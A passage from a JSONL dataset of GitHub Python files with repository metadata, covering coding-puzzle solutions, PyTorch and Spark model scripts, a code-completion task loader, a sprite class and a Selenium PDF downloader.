s:\n result = min(result, end-start+1)\n if start == end:\n break\n tmp = tmp - numbers[start]\n start = start + 1\n else:\n end = end + 1\n if end == n:\n break\n tmp = tmp + numbers[end]\n \n \nif result == int(1e9):\n print(0)\nelse:\n print(result)","repo_name":"JungWooGeon/BAEKJOON","sub_path":"1806.py","file_name":"1806.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214043004","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def deleteDuplicates(self, head):\n \"\"\"\n simple question, runs in 44ms beats 100%\n \"\"\"\n if not head:\n return head\n cur = head\n while cur.next:\n if cur.next.val == cur.val:\n cur.next = cur.next.next\n else:\n cur = cur.next\n return head","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/83_RemoveDuplicatesFromSortedList.py","file_name":"83_RemoveDuplicatesFromSortedList.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21450507865","text":"class SnapshotArray(object):\n\n def __init__(self, length):\n \"\"\"\n Runtime: 588 ms, faster than 32.91% of Python online submissions for Snapshot Array.\n Memory Usage: 51.1 MB, less than 100.00% of Python online submissions for Snapshot Array.\n S:O(n)\n :type length: int\n \"\"\"\n self.history = [[[0,0]] for _ in range(length)] #[ver, value]\n self.ver = 0\n\n def set(self, index, val):\n \"\"\"\n T:O(1)\n :type index: int\n :type val: int\n :rtype: None\n \"\"\"\n last = self.history[index][-1] # last = [ver, value]\n if last[0] == self.ver:\n last[1] = val\n else:\n self.history[index].append([self.ver, val])\n\n def snap(self):\n \"\"\"\n T:O(1)\n :rtype: int\n \"\"\"\n self.ver += 1\n return self.ver-1\n\n\n def get(self, index, snap_id):\n \"\"\"\n T:(log(n))\n :type index: int\n :type snap_id: int\n :rtype: int\n \"\"\"\n if snap_id > self.ver:\n return None\n return self.bs(self.history[index], snap_id)\n\n\n def bs(self, lst, snap_id):\n l, r = 0, len(lst)\n while l < r:\n mid = (l+r-1)/2\n if lst[mid][0] > snap_id:\n r = mid\n else:\n l = mid+1\n return lst[l-1][1]\n\n\n\n\n# Your SnapshotArray object will be instantiated and called as such:\n# obj = SnapshotArray(length)\n# obj.set(index,val)\n# param_2 = obj.snap()\n# param_3 = obj.get(index,snap_id)","repo_name":"jerrt2003/leetcode-in-python","sub_path":"1146_Snapshot_Array/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16001920888","text":"from __future__ import print_function\n\nimport torch.nn as nn\nimport torch.nn.init\n\nfrom torch.utils.data import Dataset, DataLoader\ntorch.set_printoptions(precision=10)\n\nimport timeit\nimport numpy as np\nimport torch\n\nfrom Utils_JSK_workshop import Extraction_Features, awgn, CNN_workshop_SS, CNN_workshop\n\nif torch.cuda.is_available():\n device = 'cuda'\nelse:\n 'cpu'\nif device == 'cuda':\n torch.cuda.manual_seed(7777)\nelse:\n torch.manual_seed(7777)\n\n#############################################################################################################\n## [시작] Phase 2. Classifier Test 부\n## 목적 : 구성된 Dataset 에 대한 RF Fingerprinting model 학습 및 성능을 평가하는 단계\n#############################################################################################################\n\n##\n## Dataset loader\n##\n\n##\n## Reference Database number : 0\n##\nDB_num = 0\nprint('The ' + str(DB_num) + 'th database is loaded')\ntest_DB_raw = np.load('./Models/DB/[' + str(DB_num) + '][8C]Test_DB_raw.npy')\ntest_label_DB = np.load('./Models/DB/[' + str(DB_num) + '][8C]Test_label_DB.npy')\n\n##\n## Model TEST를 위한 Dataloader class 정의\n##\n\nclass RF_test(Dataset):\n def __init__(self):\n self.len = test_DB_raw.shape[0]\n self.x_data_real = torch.from_numpy(np.real(test_DB_raw)).float()\n self.x_data_image = torch.from_numpy(np.imag(test_DB_raw)).float()\n\n self.y_data = torch.from_numpy(test_label_DB).long()\n\n def __getitem__(self, index):\n return self.x_data_real[index], self.x_data_image[index], self.y_data[index]\n\n def __len__(self):\n return self.len\n\n##\n## TEST 시작, 편의상 Average 는 1번만 수행\n##\nAvg_times = 1\n\nfor zzz in range(Avg_times):\n zzz = zzz + 1\n\n print('The ' + str(zzz) + 'th avg_times are ongoing')\n\n #######################################################\n ## [시작] Phase 2-1. Model Testing\n ## 목적 : 앞서 학습된 Model 의 성능을 평가하기 위함.\n #######################################################\n\n Extractors = Extraction_Features()\n\n ##\n ## Target SNR 정의 (AWGN)\n ## SNR < 1000 -> NO AWGN noise case\n ## SNR := [1000(No SNR), ... (Target SNR)]\n ##\n\n # SNR_range = list(range(20, 20 + 1, 5))\n SNR_range = []\n SNR_range.insert(0,1000)\n\n SNR_result = np.zeros((6, len(SNR_range)))\n\n for k in range(len(SNR_range)):\n check_point = 0\n\n SNR = SNR_range[k]\n # print(SNR)\n\n\n # ##\n # ## Classifier model definition.\n # ## For version 1, Define your own classifier models\n # ## Phase 1-1 에서 학습 및 저장된 model 을 불러오는 과정.\n # ##\n\n model_version = 'CNN'\n new_model = CNN_workshop().to(device)\n # new_model = CNN_workshop_SS().to(device)\n\n ##\n ## Classifier model definition.\n ## For version 1, including Ethernet connection and googlenet structure\n ## Phase 1-1 에서 학습 및 저장된 model 을 불러오는 과정.\n\n ##\n ## URL : https://pytorch.org/hub/pytorch_vision_googlenet/\n ##\n\n # model_version = 'GoogLeNet'\n # new_model = torch.hub.load('pytorch/vision:v0.6.0', 'googlenet', pretrained=True).to(device)\n # new_model.transform_input = False\n #\n # num_out_chs = new_model.conv1.conv.out_channels\n # new_model.conv1.conv = nn.Conv2d(1, num_out_chs, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n #\n # num_ftrs = new_model.fc.in_features\n # new_model.fc = nn.Linear(num_ftrs,8,bias=True)\n #\n # new_model = new_model.to(device)\n\n\n ##\n ## Training 과정에서 저장해둔 model structure 및 parameter 를, 불러오는 과정\n ##\n\n new_model.load_state_dict(torch.load(\"./Models/RF_fingerprinting/[\" + str(zzz) + \"][\" + model_version + \"]Classifier_\" + str(SNR) + \".pth\"))\n\n print(\"[Avg : {:>3}] [SNR : {:>3}] Load the model from *.pth files\".format(zzz, SNR))\n\n ##\n ## Pytorch 정의에 따른 Dataset loader\n ##\n dataset_test = RF_test()\n test_loader = DataLoader(dataset=dataset_test, batch_size=1, shuffle=True, num_workers=0)\n\n with torch.no_grad():\n new_model.eval()\n\n avg_acc = 0\n avg_test_time = 0\n avg_Feature_time = 0\n avg_STFT_time = 0\n\n total_batch_test = len(test_loader)\n\n Num_class = 8\n Conf_mat = np.zeros((Num_class,Num_class))\n\n for i, data in enumerate(test_loader):\n\n inputs_raw_real, imputs_raw_image, labels = data\n\n if SNR < 1000:\n inputs_raw_real, imputs_raw_image = awgn(inputs_raw_real.numpy(), imputs_raw_image.numpy(), SNR)\n inputs_sig_test = inputs_raw_real + 1j * imputs_raw_image\n else:\n inputs_sig_test = inputs_raw_real.numpy() + 1j * imputs_raw_image.numpy()\n\n _ , features_spectrum, features_time, features_spectrum_time = Extractors.RTextraction(inputs_sig_test)\n\n # _ , features_spectrum, features_time, features_spectrum_time = Extractors.SSextraction(inputs_sig_test)\n\n tmp = np.reshape(features_spectrum,\n (\n features_spectrum.shape[0], 1, features_spectrum.shape[1], features_spectrum.shape[2]))\n features_spectrum = torch.from_numpy(tmp).float()\n\n inputs = features_spectrum.to(device)\n\n labels = labels.to(device)\n\n ##\n ## Tensor 구조의 TEST 데이터를 Model 에 입력하는 부분.\n ##\n testing_st = timeit.default_timer()\n prediction_Ts = new_model(inputs)\n\n testing_fi = timeit.default_timer()\n test_time = -1*(testing_st-testing_fi)\n\n ##\n ## Output 결과를 Labels와 비교하는 부분\n ##\n correct_prediction_Ts = torch.argmax(prediction_Ts, 1) == labels\n accuracy_Ts = correct_prediction_Ts.float().mean()\n\n ##\n ## Sample test 및 Top 3 prediction 결과 확인을 위함.\n ##\n ex_acc, ex_label = torch.sort(torch.softmax(prediction_Ts, 1)[0, :], descending=True)\n\n print(' ')\n print('Prediction Test examples [Top-3 predictions]')\n print('The model predict the test inputs as : ')\n print('1st predictions : [Device ID : {:>=3}] with confidence score [{:>=3}]'.format(ex_label[0] + 1, ex_acc[0]))\n print('2nd predictions : [Device ID : {:>=3}] with confidence score [{:>=3}]'.format(ex_label[1] + 1, ex_acc[1]))\n print('3rd predictions : [Device ID : {:>=3}] with confidence score [{:>=3}]'.format(ex_label[2] + 1, ex_acc[2]))\n print(' ')\n\n avg_test_time += test_time\n avg_acc += accuracy_Ts\n avg_Feature_time += features_time\n avg_STFT_time += features_spectrum_time\n\n for jj in range(len(labels)):\n Act_val = labels[jj]\n Pre_val = torch.argmax(prediction_Ts, 1).cpu().numpy()[jj]\n Conf_mat[Act_val,Pre_val] += 1\n\n np.savetxt(\"./Models/RF_fingerprinting/[\" + str(zzz) + \"][\" + model_version + \"]Classifier_\" + str(SNR) + \"_conf_mat.csv\", Conf_mat, delimiter=\",\")\n\n print(\"[Avg : {:>3}] Test for [SNR : {:>3}] is finished\".format(zzz, SNR))\n\n avg_acc = avg_acc / total_batch_test\n avg_test_time = avg_test_time / total_batch_test\n avg_Feature_time = avg_Feature_time / dataset_test.len\n avg_STFT_time = avg_STFT_time / dataset_test.len\n\n # print('Accuracy_Ts:', avg_acc.item())\n tmp_val = avg_acc.item()\n print('[Avg : {:>=3}] [SNR : {:>=3}] Accuracy_Ts: {:>=4}'.format(zzz, SNR, tmp_val))\n print('[Avg : {:>=3}] [SNR : {:>=3}] Avg_Feature_time: {:>=4}'.format(zzz, SNR, avg_Feature_time))\n print('[Avg : {:>=3}] [SNR : {:>=3}] Avg_STFT_time: {:>=4}'.format(zzz, SNR, avg_STFT_time))\n print('[Avg : {:>=3}] [SNR : {:>=3}] Avg_test_time : {:>=4}'.format(zzz, SNR, avg_test_time))\n print('[Avg : {:>=3}] Testing_finished'.format(zzz))\n\n SNR_result[0, k] = SNR\n SNR_result[1, k] = avg_acc\n SNR_result[2, k] = avg_Feature_time\n SNR_result[3, k] = avg_STFT_time\n SNR_result[4, k] = avg_test_time\n\n np.savetxt('./Models/RF_fingerprinting/[' + str(zzz) + '][' + model_version + ']Testing_result.csv', SNR_result)\n\n #######################################################\n ## [종료] Phase 2-1. (Offline) Testing procedure finished\n #######################################################\n\n\n\n","repo_name":"Jusungkang/INFONET_workshop","sub_path":"[INFONET]RF_Fingerprinting_testing_v1.py","file_name":"[INFONET]RF_Fingerprinting_testing_v1.py","file_ext":"py","file_size_in_byte":9096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40398792499","text":"import os\nimport re\n\nimport numpy as np\nimport torch\n\nfrom ncc import LOGGER\nfrom ncc.data import constants\nfrom ncc.data import indexed_dataset\nfrom ncc.data.completion.completion_dataset import CompletionDataset\nfrom ncc.data.completion.completion_dictionary import CompletionDictionary as Dictionary\nfrom ncc.data.wrappers.truncate_dataset import TruncateDataset\nfrom ncc.tasks import register_task\nfrom ncc.tasks.ncc_task import NccTask\nfrom ncc.data.wrappers.concat_dataset import ConcatDataset\nfrom ncc.utils import utils\nfrom ncc.utils.logging import metrics\nfrom .completion import CompletionTask\n\n\ndef _load_dataset(path, impl, dict=None):\n if impl == 'raw':\n raise NotImplementedError(impl)\n elif impl == 'mmap':\n # mmap dataset has been numberized, no need for dict\n src_dataset = indexed_dataset.MMapIndexedDataset(path=path)\n else:\n raise NotImplementedError(\"No such {} dataset implementation.\".format(impl))\n return src_dataset\n\n\ndef load_token_dataset(\n data_paths, split, tgt, tgt_dict, dataset_impl,\n attrs=None, attr_dict=None,\n attrs_mapping=None, reversed_attrs_mapping=None,\n truncate_target=False, max_target_positions=None,\n):\n # load tokens\n tgt_dataset = []\n for data_path in data_paths:\n tgt_path = os.path.join(data_path, '{}.{}'.format(split, tgt))\n tgt_dataset.append(_load_dataset(tgt_path, dataset_impl))\n tgt_dataset = ConcatDataset(tgt_dataset)\n if truncate_target:\n tgt_dataset = TruncateDataset(tgt_dataset, max_target_positions)\n LOGGER.info('Truncate dataset into max length: {}'.format(max_target_positions))\n LOGGER.info('loaded {} examples from: {}'.format(len(tgt_dataset), data_paths))\n # load tokens.ext\n tgt_ext_paths = [os.path.join(data_path, '{}.{}.ext'.format(split, tgt)) for data_path in data_paths]\n if all(indexed_dataset.SeqIndexedDataset.exists(tgt_ext_path) for tgt_ext_path in tgt_ext_paths):\n tgt_ext_dataset = indexed_dataset.SeqIndexedDataset(tgt_ext_paths[0])\n for tgt_ext_path in tgt_ext_paths[1:]:\n tgt_ext_dataset.append(indexed_dataset.SeqIndexedDataset(tgt_ext_path))\n if truncate_target:\n tgt_ext_dataset.clip(max_position=max_target_positions)\n assert len(tgt_dataset) == len(tgt_ext_dataset), (len(tgt_dataset), len(tgt_ext_dataset))\n else:\n tgt_ext_dataset = None\n # load attrs\n if attrs is None:\n attr_dataset = None\n else:\n attr_dataset = []\n for data_path in data_paths:\n attr_path = os.path.join(data_path, '{}.code_types'.format(split))\n attr_dataset.append(_load_dataset(attr_path, dataset_impl))\n attr_dataset = ConcatDataset(attr_dataset)\n if truncate_target:\n tgt_dataset = TruncateDataset(tgt_dataset, max_target_positions)\n LOGGER.info('Truncate dataset\\'s attributes into max length: {}'.format(max_target_positions))\n LOGGER.info('loaded {} examples from: {}'.format(len(attr_dataset), data_path))\n # load attr.ext\n attr_ext_paths = [os.path.join(data_path, '{}.code_types.ext'.format(split)) for data_path in data_paths]\n if all(indexed_dataset.SeqIndexedDataset.exists(attr_ext_path) for attr_ext_path in attr_ext_paths):\n attr_ext_dataset = indexed_dataset.SeqIndexedDataset(attr_ext_paths[0])\n for attr_ext_path in attr_ext_paths[1:]:\n attr_ext_dataset.append(indexed_dataset.SeqIndexedDataset(attr_ext_path))\n if truncate_target:\n attr_ext_dataset.clip(max_position=max_target_positions)\n assert np.all(tgt_ext_dataset == attr_ext_dataset)\n del attr_ext_dataset\n\n return CompletionDataset(\n tgt_dataset, tgt_dataset.sizes, tgt_dict, extends=tgt_ext_dataset,\n attrs=attrs, attr_indices=attr_dataset, attr_dict=attr_dict,\n attrs_mapping=attrs_mapping, reversed_attrs_mapping=reversed_attrs_mapping,\n max_target_positions=max_target_positions,\n )\n\n\n@register_task('multi_task_completion')\nclass MultiTaskCompletionTask(CompletionTask):\n \"\"\"Task for training masked language models (e.g., BERT, RoBERTa).\"\"\"\n\n def __init__(self, args, dictionary, token_dictionary=None):\n super().__init__(args, dictionary, token_dictionary)\n\n @classmethod\n def setup_task(cls, args, **kwargs):\n \"\"\"Setup the task (e.g., load dictionaries).\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n \"\"\"\n\n paths = utils.split_paths(args['task']['data'])\n assert len(paths) > 0\n # load dictionaries\n dict_file = os.path.join(paths[0], '{}.dict.jsonl'.format(args['task']['target_lang']))\n dictionary = cls.load_dictionary(dict_file)\n LOGGER.info('[{}] dictionary: {} types'.format(args['task']['target_lang'], len(dictionary)))\n token_file = os.path.join(paths[0], 'code_types.dict.jsonl')\n if os.path.exists(token_file):\n token_dictionary = cls.load_dictionary(token_file)\n LOGGER.info('[code_tokens] dictionary: {} types'.format(len(token_dictionary)))\n else:\n token_dictionary = None\n return cls(args, dictionary, token_dictionary)\n\n def load_dataset(self, split, epoch=1, combine=False, **kwargs):\n \"\"\"Load a given dataset split.\n\n Args:\n split (str): name of the split (e.g., train, valid, test)\n \"\"\"\n paths = utils.split_paths(self.args['task']['data'])\n assert len(paths) > 0\n data_path = paths[(epoch - 1) % len(paths)]\n\n if self.args['task']['target_lang'] == 'code_tokens' and self.args['task'].get('code_types', False):\n attrs_mapping = {\n 'attr': {self.token_dictionary.index('attr')},\n 'num': {self.token_dictionary.index('Num')},\n 'name': {self.token_dictionary.index('NameStore'),\n self.token_dictionary.index('NameLoad')},\n 'param': {self.token_dictionary.index('arg'),\n self.token_dictionary.index('kwarg'),\n self.token_dictionary.index('vararg')},\n }\n elif self.args['task']['target_lang'] == 'ast' and self.args['task'].get('code_types', False):\n attrs_mapping = {\n 'attr': {self.token_dictionary.index('attr')},\n 'num': {self.token_dictionary.index('Num')},\n 'name': {self.token_dictionary.index('NameStore'),\n self.token_dictionary.index('NameLoad')},\n 'param': {self.token_dictionary.index('NameParam')},\n }\n else:\n attrs_mapping = None\n\n if attrs_mapping:\n reversed_attrs_mapping = {}\n for k, vs in attrs_mapping.items():\n if len(vs) > 1:\n for v in vs:\n reversed_attrs_mapping[v] = k\n else:\n reversed_attrs_mapping[list(vs)[0]] = k\n else:\n reversed_attrs_mapping = None\n\n data_paths = [os.path.join(data_path, task_name) for task_name in self.args['task']['task_pipeline']]\n\n self.datasets[split] = load_token_dataset(\n data_paths, split, self.args['task']['target_lang'], self.target_dictionary,\n attrs_mapping=attrs_mapping, reversed_attrs_mapping=reversed_attrs_mapping,\n attrs=self.args['task'].get('code_types', None),\n attr_dict=self.token_dictionary,\n dataset_impl=self.args['dataset']['dataset_impl'],\n truncate_target=self.args['dataset'].get('truncate_target', False),\n max_target_positions=self.max_positions()\n )\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/tasks/completion/multitask_completion.py","file_name":"multitask_completion.py","file_ext":"py","file_size_in_byte":7764,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"38023299230","text":"from typing import List\n\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n results = [1] * len(nums)\n suffix_product = 1\n for i in range(1, len(nums)):\n results[i] = nums[i - 1] * results[i - 1]\n for i in range(len(nums) - 1, -1, -1):\n results[i] *= suffix_product\n suffix_product *= nums[i]\n return results\n","repo_name":"Penguin-jpg/LeetCode","sub_path":"Top_Interview_Questions/Medium/238. Product of Array Except Self/solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9999640608","text":"\"\"\"\n给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。\n你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出该股票。设计一个算法来计算你所能获取的最大利润。\n返回你可以从这笔交易中获取的最大利润。如果你不能获取任何利润,返回 0 。\n\"\"\"\nfrom typing import List\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n ret = start = 0\n for i in range(1, len(prices)):\n # 当最小价格小于start指针切换至当前\n if prices[i] - prices[start] < 0:\n start = i\n # 每次比较最优抛售价格\n ret = max(prices[i] - prices[start], ret)\n return ret\n\nresult=Solution()\nprint(result.maxProfit([1,2]))","repo_name":"kongkongo/LeetCode","sub_path":"maxProfit.py","file_name":"maxProfit.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71710287527","text":"import os\nimport shutil\nimport time\nfrom ast import Assert\nfrom lib2to3.pgen2 import driver\nfrom multiprocessing.connection import wait\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom UploadpdfToGoogleDrive import UploadPdftoGdrive\n\n\nclass Downloadpdffromwebsite:\n def __init__(self):\n self.chrome_path = \"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\Rar$EX00.687\\\\chromedriver\"#set your own webdriver.exe file path\n #options setup:\n self.chrome_options = webdriver.ChromeOptions()\n self.chrome_options.add_argument(\"--disable-popup-blocking\")\n self.chrome_options.add_argument(\"--disable-notifications\")\n self.chrome_options.add_argument(\"start-maximized\");\n self.chrome_options.add_argument(\"disable-infobars\")\n self.chrome_options.add_argument(\"--disable-extensions\")\n prefs = {\"download.default_directory\" : \"C:\\\\Users\\\\user\\\\Desktop\\\\iman\\\\DataImbalanced\\\\NoorsBooksScraping\\\\Download\"}\n self.chrome_options.add_experimental_option(\"prefs\",prefs)\n #initialize webdriver state\n self.driver = webdriver.Chrome(self.chrome_path,chrome_options=self.chrome_options)\n\n\n # method to get the downloaded file name\n def get_and_rename_downLoaded_file_name(self,new_name_file,download_path,waitTime=20):\n \n file_not_exist=True\n # function to wait for all chrome downloads to finish\n def chrome_downloads(drv):\n \n if not \"chrome://downloads\" in drv.current_url: # if 'chrome downloads' is not current tab\n drv.execute_script(\"window.open('');\") # open a new tab\n drv.switch_to.window(self.driver.window_handles[1]) # switch to the new tab\n drv.get(\"chrome://downloads/\") # navigate to chrome downloads\n return drv.execute_script(\"\"\"\n return document.querySelector('downloads-manager')\n .shadowRoot.querySelector('#downloadsList')\n .items.filter(e => e.state === 'COMPLETE')\n .map(e => e.filePath || e.file_path || e.fileUrl || e.file_url);\n \"\"\")\n # wait for all the downloads to be completed\n while file_not_exist==True:\n dld_file_paths = WebDriverWait(self.driver, 120, 1).until(chrome_downloads) # returns list of downloaded file paths\n # Close the current tab (chrome downloads)\n if \"chrome://downloads\" in self.driver.current_url:\n self.driver.close()\n # Switch back to original tab\n self.driver.switch_to.window(self.driver.window_handles[0]) \n # get latest downloaded file name and path\n dlFilename = dld_file_paths[0] # latest downloaded file from the list\n # wait till downloaded file appears in download directory\n time_to_wait = waitTime # adjust timeout as per your needs\n time_counter = 0\n while not os.path.isfile(dlFilename):\n time.sleep(1)\n time_counter += 1\n if time_counter > time_to_wait:\n break\n # rename the downloaded file\n try:\n os.rename(os.path.join(download_path, dlFilename), os.path.join(download_path, new_name_file))\n file_not_exist=False\n break\n except:\n pass\n return\n\n #function to login to the website account\n def login_to_website(self,login_url='https://www.website.com/login',user_name='username@gmail.com',pass_word='*****'):#set your own acount credintials\n #login to website account manually:\n self.driver.get(login_url)\n try:\n WebDriverWait(self.driver, 60).until(\n EC.element_located_selection_state_to_be((By.CLASS_NAME, \"submit-login\"),is_selected=True))\n except: \n print('you are not logged in please try again later.')\n #login to website account auatomatically:\n\n #user_name_box=self.driver.find_element(By.NAME,\"email\"\n #user_name_box.clear()\n #user_name_box.send_keys(user_name)\n \n #pass_word_box=self.driver.find_element(By.NAME,'password')\n #pass_word_box.clear()\n #pass_word_box.send_keys(pass_word)\n\n #login_btn=self.driver.find_element(By.CLASS_NAME,'submit-login')\n #login_btn.click()\n\n def all_pdf_download(self,base_url,download_path,file_name,file_path):\n \n self.driver.minimize_window()\n self.driver.get(base_url)\n #remove adds from website page.\n all_iframes = self.driver.find_elements(By.CLASS_NAME,\"adsbygoogle\")\n print(len(all_iframes))\n if len(all_iframes) > 0:\n print(\"Ad Found\\n\")\n self.driver.execute_script(\"\"\"\n var elems = document.getElementsByClassName(\"adsbygoogle\"); \n for(var i = 0, max = elems.length; i < max; i++)\n {\n elems[i].hidden=true;\n elems[i].remove=true;\n\n }\n \"\"\")\n #click download button\n button = self.driver.find_element(By.CLASS_NAME,\"download_button\")#set the class name up on your website page source info\n button.click()\n self.driver.maximize_window()\n try:\n button = WebDriverWait(self.driver, 300).until(\n EC.element_to_be_clickable((By.CLASS_NAME, \"internal_download_link\")))#set the class name up on your website page source info\n\n button.click()\n except:\n\n print(\"{base_url} Not downloaded\")\n return {base_url : 0}\n \n #it is important to wait for the download process to be stablished successfully\n time.sleep(5)\n #function to wait for the file to be downloaded, locate the file \n # and then rename the file with the expected file name(id)\n self.get_and_rename_downLoaded_file_name(60,file_name,file_path)\n return {base_url : 1} \n #function to close the connection.\n def close_connection(self):\n self.driver.close()\n ","repo_name":"ImanHindi/WebsitePdfFilesScraping","sub_path":"Downloadpdffromwebsites.py","file_name":"Downloadpdffromwebsites.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13400884675","text":"from PIL import Image as PIL_Image\nfrom .image import Image\nfrom .component import Component\nfrom pynegin.conf import HOME\nimport pathlib\n\nclass Sprite(Component):\n def __init__(self, container, source, size=(32, 32), padding=0, per_row=1, amount=1, animated=False, animation_speed=1.0):\n \"\"\"container -> Component: parent Component of Sprite\n source -> str: path to the map (base=assets/)\n size -> tuple(int): size of single sprite\n padding -> int: padding between two sprites\n per_row -> int: amount of sprites per row\n amount -> int: total amount of sprites\n animated -> bool: do animation by default (e.g. fire)\n animation_speed -> float: seconds between animation\n \"\"\"\n\n self.container = container\n self.source = source\n self.size = size\n self.padding = padding\n self.per_row = per_row\n self.amount = amount\n self.animated = animated\n self.animation_speed = animation_speed\n self.current = 0\n\n path = pathlib.Path(HOME)\n ass_path = path.joinpath(\"assets/\")\n path = str(ass_path.joinpath(source))\n\n spriteMap = PIL_Image.open(path)\n self.sprites = []\n\n rows = round(amount / per_row)\n total_height = (rows + padding) * size[1]\n total_width = (per_row + padding) * size[0]\n for row in range(padding, total_height-size[1], padding+size[1]):\n for sp in range(padding, total_width-size[0], padding+size[0]):\n sprite = spriteMap.crop( (sp, row, sp+size[0], row+size[1]) )\n self.sprites.append( Image(container, None, fromString=True, PIL_img=sprite) )\n\n self.surface = self.sprites[0].surface\n self.rect = self.sprites[0].rect\n\n super().__init__(container, size=size, surface=self.surface)\n\n\n def show(self, surf):\n self._update()\n self.sprites[self.current].show(surf)\n\n def _update(self):\n self.rect = self.sprites[self.current].rect\n\n def center(self):\n self.centerHorizontal()\n self.centerVertical()\n\n def centerHorizontal(self):\n for sprite in self.sprites:\n sprite.centerHorizontal()\n\n def centerVertical(self):\n for sprite in self.sprites:\n sprite.centerVertical()\n\n def moveHorizontal(self, distance):\n for sprite in self.sprites:\n sprite.moveHorizontal(distance)\n\n def moveVertical(self, distance):\n for sprite in self.sprites:\n sprite.moveVertical(distance)\n\n def fitToScreen(self, window):\n for sprite in self.sprites:\n sprite.fitToScreen(window)\n\n def resize(self, size):\n for sprite in self.sprites:\n sprite.resize(size)\n\n def next(self):\n self.current = (self.current + 1) % len(self.sprites)\n\n def select(self, s):\n self.current = s % len(self.sprites)\n","repo_name":"wilfreddv/pynegin","sub_path":"pynegin/components/sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70967446249","text":"from sparktorch import serialize_torch_obj, SparkTorch\nfrom pyspark.sql import SparkSession\nfrom model import UNet\nfrom loss import soft_dice_loss\nimport torch\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.pipeline import Pipeline\n\ndata_train_path = '/home/deepak/Courseworks/CS505_Big_Data/Project/mit_100x64x64.csv'\n\nspark = SparkSession.builder.appName(\"UNet\").master('local[2]').getOrCreate()\n\nnetwork = UNet(1)\n\ntorch_obj = serialize_torch_obj(\n model = network,\n criterion=soft_dice_loss,\n optimizer=torch.optim.Adam,\n lr=0.0001\n)\n\nspark_model = SparkTorch(\n inputCol='features',\n labelCol='labels',\n predictionCol='predictions',\n torchObj=torch_obj,\n iters=10,\n verbose=1\n)\n\nprint(\"Ran successfully\")\n\ndata_train = spark.read.option(\"inferSchema\",\"true\").option(\"maxColumns\",64*64*4).csv(data_train_path)\n\nfeatures_size = 64*64*3\nva1 = VectorAssembler(inputCols=data_train.columns[:features_size],\n outputCol='features')\nva2 = VectorAssembler(inputCols=data_train.columns[features_size:],\n outputCol='labels')\n\np = Pipeline(stages=[va1, va2, spark_model]).fit(data_train)\np.save('unet')\n","repo_name":"deepaks2112/RoadDetectionSpark","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21776183433","text":"from abc import ABC\n\nfrom config import ConfigPackageProvider\n\n\nclass BaseTracker(ConfigPackageProvider, ABC):\n \"\"\"\n A Tracker which tracks some value from a given input.\n \"\"\"\n\n def __init__(self, config):\n # validate config\n if self not in config:\n raise RuntimeError('Necessary Package Provider is not in current Config!')\n\n self.input = None\n self.tracked_data = None\n","repo_name":"Mirevi/face-synthesizer-JVRB","sub_path":"tracking/base_tracker.py","file_name":"base_tracker.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"344383257","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 9 20:45:26 2021\n\n@author: 曾睿恩\n\"\"\"\n\n \na=int(input(\"搭了幾次電梯:\"))\nb=0\nc=0\nd=0\ne=0\ns=1\nfor i in range(a):\n n=int(input(\"\"))\n if n>s:\n up=(n-s)*20\n b=b+d\n s=n\n elif n<s:\n e=(s-n)*10\n c=c+e\n s=n\nfee=c+b\nprint(fee) ","repo_name":"c109156126/h","sub_path":"40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35210519601","text":"import argparse\n\nimport ijson\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom sklearn.metrics import mutual_info_score\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_label_dictionary(file):\n f = open(file, encoding=\"utf8\", errors='ignore')\n objects = ijson.items(f, 'articles.item')\n all_label = []\n label_id = []\n for obj in tqdm(objects):\n try:\n original_label = obj[\"meshMajor\"]\n mesh_id = obj['meshId']\n all_label.append(original_label)\n label_id.append(mesh_id)\n except AttributeError:\n print(obj[\"pmid\"].strip())\n\n 